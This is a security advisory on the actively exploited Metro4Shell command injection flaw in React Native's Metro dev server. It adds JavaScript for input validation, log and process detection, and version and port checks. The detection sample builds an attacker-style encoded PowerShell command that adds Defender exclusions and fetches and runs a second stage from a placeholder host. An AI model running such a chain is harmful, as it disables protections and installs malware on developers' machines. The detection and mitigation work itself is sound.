Security researchers at VulnCheck have confirmed active exploitation of CVE-2025-11953, a critical command injection vulnerability in React Native’s Metro Development Server. Dubbed Metro4Shell, the flaw allows unauthenticated remote code execution and has been exploited since December 2025 to deploy Rust-based malware on developer systems.
Vulnerability overview
| Attribute | Details |
|---|---|
| CVE | CVE-2025-11953 |
| Name | Metro4Shell |
| CVSS score | 9.8 (Critical) |
| Affected package | @react-native-community/cli |
| Weekly downloads | ~2 million |
| Affected versions | 4.8.0 through 20.0.0-alpha.2 |
| Fixed version | 20.0.0 |
| In-the-wild exploitation reported by | VulnCheck |
Timeline
| Date | Event |
|---|---|
| Early November 2025 | CVE-2025-11953 disclosed |
| December 21, 2025 | VulnCheck observes first exploitation |
| January 4, 2026 | Additional exploitation observed |
| January 21, 2026 | Continued exploitation confirmed |
| February 4, 2026 | VulnCheck publishes exploitation details |
Technical details
Root cause
The Metro Development Server, which serves the JavaScript bundle while a React Native app is being developed, exposes an /open-url endpoint. The url parameter of a POST request to that endpoint is handed to the operating system without adequate validation, so a crafted value is interpreted as a command rather than as a URL to open.
| Component | Issue |
|---|---|
| Endpoint | /open-url |
| Parameter | url |
| Flaw | Insufficient input validation before the value reaches the OS |
| Impact | Arbitrary command execution as the developer's user |
Exploitation mechanism
| Platform | Capability |
|---|---|
| Windows | Execute arbitrary programs and shell commands with attacker-controlled arguments |
| Linux/macOS | Launch arbitrary executables (without control over their arguments) |
In affected versions the Metro server listens on all network interfaces by default rather than on localhost, so anyone who can reach the port can send the malicious POST request, and the endpoint requires no authentication.
Attack request example
| Element | Description |
|---|---|
| Method | POST |
| Endpoint | /open-url |
| Parameter | url containing the malicious payload |
| Result | Command execution on the developer's machine |
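The request shape above is sufficient for an attacker because the url value is never checked before it reaches the operating system. As an added example written for this page (not Metro or React Native CLI code, and not a description of how the upstream fix is implemented), here is the validation and spawning discipline a hardened handler for an endpoint of this kind needs. The JSON body shape, the loopback-only caller check and the per-platform opener binaries are assumptions of this example.

```javascript
// Added example: the validation and spawning discipline a hardened handler for an
// endpoint like /open-url needs. Illustrative code written for this page, not the Metro
// or React Native CLI source, and not a description of how the upstream fix works.
// Assumptions of this example: the body is a JSON object {"url": ...}, only loopback
// callers are served, and the per-platform opener binaries named below.
// Node.js, no third-party dependencies.

const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

// Returns { ok: true, url } with a normalised URL, or { ok: false, reason }.
function validateOpenUrl(raw) {
  if (typeof raw !== 'string') return { ok: false, reason: 'url must be a string' };
  if (raw.length === 0 || raw.length > 2048) return { ok: false, reason: 'url length out of range' };
  // WHATWG URL parsing silently drops tabs/newlines and trims C0 controls, so
  // reject them on the raw string before the parser hides them.
  if (/[\s\x00-\x1f\x7f]/.test(raw)) return { ok: false, reason: 'whitespace or control character in url' };
  let parsed;
  try {
    parsed = new URL(raw);
  } catch {
    return { ok: false, reason: 'not an absolute URL' };
  }
  // The scheme allowlist is what keeps file:, javascript: and bare program paths out.
  if (!ALLOWED_PROTOCOLS.has(parsed.protocol)) return { ok: false, reason: `scheme ${parsed.protocol} not allowed` };
  // Userinfo is never needed to open a dev page; reject rather than strip.
  if (parsed.username || parsed.password) return { ok: false, reason: 'userinfo not allowed' };
  return { ok: true, url: parsed.href };
}

function isLoopback(addr) {
  return addr === '127.0.0.1' || addr === '::1' || addr === '::ffff:127.0.0.1';
}

// The opener is invoked as argv with shell: false: the URL is one argument, so shell
// metacharacters inside it are never interpreted. Binary names are an assumption.
function openCommandFor(platform, url) {
  if (platform === 'darwin') return { command: 'open', args: [url], shell: false };
  if (platform === 'win32') return { command: 'explorer.exe', args: [url], shell: false };
  return { command: 'xdg-open', args: [url], shell: false };
}

// Full request handling: caller check, body parsing, URL validation, then the
// spawn description (the caller would pass it to child_process.spawn).
function handleOpenUrl(rawBody, remoteAddress, platform = process.platform) {
  // Defence in depth: a dev-only endpoint should not act for remote callers even
  // when the process was started listening on all interfaces.
  if (!isLoopback(remoteAddress)) return { status: 403, error: 'remote callers not allowed' };
  let body;
  try {
    body = JSON.parse(rawBody);
  } catch {
    return { status: 400, error: 'body is not valid JSON' };
  }
  if (body === null || typeof body !== 'object') return { status: 400, error: 'body must be a JSON object' };
  const result = validateOpenUrl(body.url);
  if (!result.ok) return { status: 400, error: result.reason };
  return { status: 200, spawn: openCommandFor(platform, result.url) };
}

// Constructed requests exercising the handler.
console.log(handleOpenUrl('{"url":"http://localhost:8081/debugger-ui"}', '127.0.0.1', 'linux'));
console.log(handleOpenUrl('{"url":"file:///etc/passwd"}', '127.0.0.1', 'linux'));
console.log(handleOpenUrl('{"url":"http://localhost/"}', '192.0.2.10', 'linux'));
```

The validator deliberately does not try to strip shell metacharacters: once the URL travels as a single argv element with shell: false there is no shell to interpret them, and the scheme allowlist is what rules out file:, javascript: and plain executable paths.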
Exploitation in the wild
VulnCheck observations
| Date | Activity |
|---|---|
| December 21, 2025 | First recorded exploitation on the VulnCheck Canary network |
| January 4, 2026 | Same payloads delivered |
| January 21, 2026 | Continued operational use |
VulnCheck characterized the activity:
“The delivered payloads were consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing.”
Attack sophistication
| Indicator | Assessment |
|---|---|
| Payload consistency | Operational, not experimental |
| Multi-week duration | Sustained campaign |
| Cross-platform targeting | Windows and Linux payloads |
| Malware sophistication | Custom Rust-based implant |
Attack chain
Stage 1: Initial exploitation
| Step | Action |
|---|---|
| 1 | Scan for exposed Metro Development Servers |
| 2 | Send a POST request to the /open-url endpoint |
| 3 | Trigger command execution via the malicious url parameter |
Stage 2: Payload delivery (Windows)
| Step | Action |
|---|---|
| 1 | cmd.exe executes with a base64-encoded PowerShell payload |
| 2 | PowerShell adds Windows Defender exclusions |
| 3 | Exclusions cover the current directory and %TEMP% |
| 4 | Second-stage payload downloaded |
| 5 | Rust-based malware executed |
Stage 3: Malware deployment
| Attribute | Details |
|---|---|
| Language | Rust |
| Anti-analysis | Basic evasion logic |
| Persistence | Under investigation |
| Targets | Windows and Linux systems |
The awareness gap
Despite active exploitation since December 2025, the vulnerability has received limited attention:
| Metric | Status |
|---|---|
| EPSS score | 0.00405 (a predicted 30-day exploitation probability of about 0.4%, i.e. low, despite exploitation already being observed) |
| Public acknowledgment | Limited |
| Security community awareness | Low |
| Time since first exploitation | 6+ weeks |
VulnCheck noted:
“This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and exposed on the public internet.”
Why developers are targets
High-value access
| Asset | Value to attackers |
|---|---|
| Source code | Intellectual property theft |
| Credentials | API keys, tokens, secrets |
| CI/CD access | Supply chain compromise |
| Corporate network | Lateral movement |
| Signing keys | Malicious package distribution |
Development environment risks
| Risk factor | Impact |
|---|---|
| Elevated privileges | Developers often have admin access |
| Network exposure | Dev servers accessible from the network |
| Security tooling gaps | EDR may exclude dev tools |
| Trust assumptions | Internal tools assumed safe |
Detection
Network indicators
| Indicator | Detection method |
|---|---|
| POST requests to the Metro server from non-loopback sources | Web server / reverse proxy logs |
| Requests to the /open-url endpoint | Request logging |
| Unusual outbound connections from developer machines | Network monitoring |
Host indicators
| Indicator | Detection method |
|---|---|
| Windows Defender exclusions added (current directory, %TEMP%) | Windows Security and Defender operational logs |
| cmd.exe launching PowerShell with a base64-encoded command | Command-line logging |
| PowerShell spawned by a development server process | Process monitoring |
| Execution of an unknown Rust binary | Process monitoring |
| Unusual file activity in %TEMP% | File system monitoring |
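The indicators above become actionable once they are turned into checks over the logs an organisation actually has. The following is an added example written for this page, not detection content from VulnCheck: it runs the network check over access-log lines and the host check over process-creation command lines. The log format, the sample lines and the attacker-style command line are constructed (the download host is a TEST-NET placeholder), and the rule names are this example's own.

```javascript
// Added example: detection logic for the network and host indicators in the tables
// above. Written for this page; the access-log lines and the process command lines
// are constructed samples, not captures from the VulnCheck report. Node.js, stdlib only.

// ---- Network side: access-log lines in combined log format, as written by a reverse
// proxy or gateway in front of the developer machine. Constructed sample.
const SAMPLE_ACCESS_LOG = [
  '192.0.2.10 - - [21/Dec/2025:03:14:07 +0000] "POST /open-url HTTP/1.1" 200 2 "-" "python-requests/2.31"',
  '127.0.0.1 - - [21/Dec/2025:03:15:00 +0000] "GET /status HTTP/1.1" 200 8 "-" "node"',
  '198.51.100.7 - - [04/Jan/2026:11:02:41 +0000] "POST /open-url?x=1 HTTP/1.1" 500 0 "-" "curl/8.5.0"',
  '127.0.0.1 - - [04/Jan/2026:11:03:00 +0000] "POST /symbolicate HTTP/1.1" 200 120 "-" "okhttp/4.9"',
];

const CLF_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

function isLoopbackAddress(addr) {
  return addr === '127.0.0.1' || addr === '::1' || addr.startsWith('::ffff:127.');
}

// One finding per POST to /open-url; a non-loopback source means the server was
// reachable from the network, so those are rated higher.
function findOpenUrlRequests(lines) {
  const findings = [];
  for (const line of lines) {
    const m = CLF_RE.exec(line);
    if (!m) continue;
    const [, src, ts, method, path, status] = m;
    if (method !== 'POST' || path.split('?')[0] !== '/open-url') continue;
    findings.push({ src, ts, status: Number(status), severity: isLoopbackAddress(src) ? 'medium' : 'high' });
  }
  return findings;
}

// ---- Host side: process-creation command lines (Sysmon event 1 / Security 4688).
// PowerShell's -EncodedCommand carries base64 of UTF-16LE text, so decode with that
// encoding before matching; the chain above has cmd.exe launching exactly such a payload.
const ENCODED_CMD_RE = /-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})/i;

function decodeEncodedCommand(cmdline) {
  const m = ENCODED_CMD_RE.exec(cmdline);
  return m ? Buffer.from(m[1], 'base64').toString('utf16le') : null;
}

// Each rule corresponds to one row of the host-indicator table.
const HOST_RULES = [
  { name: 'defender_exclusion_added', re: /Add-MpPreference\b[^\n]*-ExclusionPath/i },
  { name: 'exclusion_covers_temp', re: /-ExclusionPath[^\n]*(\$env:TEMP|%TEMP%)/i },
  { name: 'second_stage_download', re: /\b(Invoke-WebRequest|iwr|wget|curl|DownloadFile|DownloadString|Start-BitsTransfer)\b/i },
];

// Returns the indicator names that fire for one command line, plus the decoded script.
function inspectProcessEvent(cmdline) {
  const decoded = decodeEncodedCommand(cmdline);
  const indicators = [];
  if (decoded !== null && /\bcmd(\.exe)?\b/i.test(cmdline)) indicators.push('cmd_launching_encoded_powershell');
  const haystack = decoded === null ? cmdline : `${cmdline}\n${decoded}`;
  for (const rule of HOST_RULES) if (rule.re.test(haystack)) indicators.push(rule.name);
  return { indicators, decoded };
}

// Constructed command lines. The first mirrors the chain described above (cmd.exe ->
// encoded PowerShell -> Defender exclusions -> download); the host is a TEST-NET
// placeholder, not real infrastructure. The second is an ordinary build script.
const SAMPLE_SCRIPT = 'Add-MpPreference -ExclusionPath (Get-Location).Path; Add-MpPreference -ExclusionPath $env:TEMP; '
  + 'Invoke-WebRequest -Uri http://192.0.2.55/stage2 -OutFile $env:TEMP\\s.exe; Start-Process $env:TEMP\\s.exe';
const SAMPLE_PROCESS_EVENT = `cmd.exe /c powershell.exe -nop -w hidden -enc ${Buffer.from(SAMPLE_SCRIPT, 'utf16le').toString('base64')}`;
const SAMPLE_BENIGN_EVENT = 'powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\\scripts\\build.ps1';

function runDetections() {
  return {
    network: findOpenUrlRequests(SAMPLE_ACCESS_LOG),
    host: [SAMPLE_PROCESS_EVENT, SAMPLE_BENIGN_EVENT].map((c) => inspectProcessEvent(c).indicators),
  };
}

console.log(JSON.stringify(runDetections(), null, 2));
```

Decoding the encoded command before matching matters: the Defender exclusion and the download never appear in clear text on the command line, so a rule that only inspects the raw cmd.exe arguments sees nothing but base64.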
Mitigation
Immediate actions
| Priority | Action |
|---|---|
| Critical | Update @react-native-community/cli to 20.0.0 or later |
| Critical | Ensure Metro development servers are not reachable from the internet |
| High | Review logs for the exploitation indicators above |
| High | Treat any machine whose Metro server was exposed during the exploitation window as potentially compromised and investigate it |
Configuration hardening
| Control | Implementation |
|---|---|
| Network binding | Start the dev server bound to loopback only (react-native start --host 127.0.0.1) instead of the default all-interfaces binding |
| Firewall rules | Block inbound access to development ports (8081 by default for Metro) from outside the host |
| Network segmentation | Isolate development environments from untrusted networks |
| VPN requirement | Require VPN access for remote development |
Verification
| Check | Command/Location |
|---|---|
| Package version | npm ls @react-native-community/cli (every copy reported, including transitive ones, must be 20.0.0 or later) |
| Metro binding | Check how the dev server is started (--host flag) and metro.config.js for host settings |
| Network exposure | netstat -an, filtered for a LISTEN entry on the Metro port (8081 by default) bound to 0.0.0.0, :: or * rather than 127.0.0.1 |
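The two verification rows above as working code, as an added example written for this page (not tooling from VulnCheck or the React Native project). It expects the text output of `npm ls --all --json` and `netstat -an` to be fed in; the inputs embedded here are constructed samples. Treating every 20.0.0 pre-release as unpatched is a conservative choice of this example, not a statement from the advisory.

```javascript
// Added example: the two verification checks above (package version, network exposure)
// as code. Written for this page, not tooling from VulnCheck or the React Native project.
// The npm and netstat inputs below are constructed samples; in practice pipe in the real
// output of `npm ls --all --json` and `netstat -an`. Node.js, stdlib only.

const AFFECTED_PACKAGE = '@react-native-community/cli';
const FIRST_AFFECTED = '4.8.0';
const FIXED = '20.0.0';
const METRO_DEFAULT_PORT = 8081;

// Minimal semver parser: major.minor.patch plus optional pre-release identifiers.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], pre: m[4] ? m[4].split('.') : null };
}

// Semver ordering: numeric fields first, then any pre-release sorts below the release
// (20.0.0-alpha.2 < 20.0.0), then identifiers numerically where both are numeric.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) if (pa.nums[i] !== pb.nums[i]) return pa.nums[i] < pb.nums[i] ? -1 : 1;
  if (pa.pre === null || pb.pre === null) return pa.pre === pb.pre ? 0 : (pa.pre === null ? 1 : -1);
  for (let i = 0; i < Math.max(pa.pre.length, pb.pre.length); i++) {
    const x = pa.pre[i], y = pb.pre[i];
    if (x === undefined) return -1;  // shorter identifier list sorts first
    if (y === undefined) return 1;
    const nx = /^\d+$/.test(x), ny = /^\d+$/.test(y);
    if (nx && ny) { if (Number(x) !== Number(y)) return Number(x) < Number(y) ? -1 : 1; }
    else if (nx !== ny) return nx ? -1 : 1;  // numeric identifiers sort before alphanumeric
    else if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Affected range from the advisory: 4.8.0 up to 20.0.0-alpha.2, fixed in 20.0.0.
// This example makes the conservative assumption that every 20.0.0 pre-release is
// unpatched, so only 20.0.0 and later pass.
function isAffectedCliVersion(version) {
  return compareVersions(version, FIRST_AFFECTED) >= 0 && compareVersions(version, FIXED) < 0;
}

// Walks the `npm ls --all --json` tree and reports every copy of the package, including
// transitive copies nested under react-native.
function findCliInstalls(tree, path = [], out = []) {
  for (const [name, node] of Object.entries(tree.dependencies || {})) {
    const here = [...path, name];
    if (name === AFFECTED_PACKAGE && node.version) {
      out.push({ path: here.join(' > '), version: node.version, affected: isAffectedCliVersion(node.version) });
    }
    findCliInstalls(node, here, out);
  }
  return out;
}

// Parses netstat-style output (Linux/Windows `addr:port`, macOS `addr.port`) and returns
// listeners on the Metro port whose bind address is not loopback.
function exposedMetroListeners(netstatOutput, port = METRO_DEFAULT_PORT) {
  const exposed = [];
  for (const line of netstatOutput.split('\n')) {
    if (!/LISTEN/i.test(line)) continue;
    for (const tok of line.trim().split(/\s+/)) {
      const m = /^(.*)[:.](\d+)$/.exec(tok);
      if (!m || Number(m[2]) !== port) continue;
      const addr = m[1].replace(/^\[|\]$/g, '');
      const loopback = addr === '::1' || addr === 'localhost' || addr.startsWith('127.');
      if (!loopback) exposed.push({ addr, port, line: line.trim() });
      break;  // the local address is the first token carrying the port
    }
  }
  return exposed;
}

// Constructed `npm ls --all --json` fragment: an affected transitive copy under
// react-native and a patched copy at the top level.
const SAMPLE_NPM_LS = {
  name: 'demo-app', version: '1.0.0',
  dependencies: {
    'react-native': { version: '0.76.0', dependencies: { '@react-native-community/cli': { version: '15.0.1' } } },
    '@react-native-community/cli': { version: '20.0.0' },
  },
};

// Constructed netstat lines in Linux, macOS and Windows formats.
const SAMPLE_NETSTAT = [
  'tcp        0      0 0.0.0.0:8081            0.0.0.0:*               LISTEN      12345/node',
  'tcp6       0      0 :::8081                 :::*                    LISTEN      12345/node',
  'tcp4       0      0  127.0.0.1.8081         *.*                    LISTEN',
  '  TCP    0.0.0.0:8081           0.0.0.0:0              LISTENING       4321',
  'tcp        0      0 127.0.0.1:8081          127.0.0.1:50322         ESTABLISHED 12345/node',
].join('\n');

console.log(findCliInstalls(SAMPLE_NPM_LS));
console.log(exposedMetroListeners(SAMPLE_NETSTAT));
```

A patched top-level copy does not clear a project on its own: the sample tree above still carries an affected 15.0.1 nested under react-native, which is why the walk reports every copy rather than the first one it finds.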
Recommendations
For development teams
| Priority | Action |
|---|---|
| Critical | Upgrade the React Native CLI immediately |
| High | Audit network exposure of dev tools |
| High | Implement network segmentation |
| Medium | Enable enhanced logging for dev environments |
| Ongoing | Monitor for suspicious development tool activity |
For security teams
| Priority | Action |
|---|---|
| Critical | Inventory React Native development environments |
| High | Threat hunt for Metro4Shell exploitation |
| High | Add detection rules for the attack indicators |
| Medium | Review developer machine security policies |
| Ongoing | Include dev tools in vulnerability management |
For organizations
| Priority | Action |
|---|---|
| High | Establish dev environment security standards |
| High | Include dev tools in the asset inventory |
| Medium | Security training for developers |
| Ongoing | Regular assessment of development security |
Context
Metro4Shell highlights the increasing targeting of developer environments and tools by threat actors. Developers represent high-value targets due to their access to source code, credentials, CI/CD pipelines, and signing keys.
The vulnerability’s characteristics make it particularly dangerous:
- High severity (CVSS 9.8)
- Easy to exploit (a single unauthenticated POST request)
- Wide exposure (~2 million weekly downloads of the affected package)
- Low awareness (limited public acknowledgment)
- Active exploitation (operational attacks observed over several weeks)
The gap between exploitation start (December 2025) and broader security community awareness demonstrates that traditional vulnerability prioritization metrics (like EPSS) may not reflect actual risk for developer-focused vulnerabilities.
Organizations should treat development environments as critical infrastructure and apply the same security rigor used for production systems. The days of assuming internal development tools are safe from external attack are over.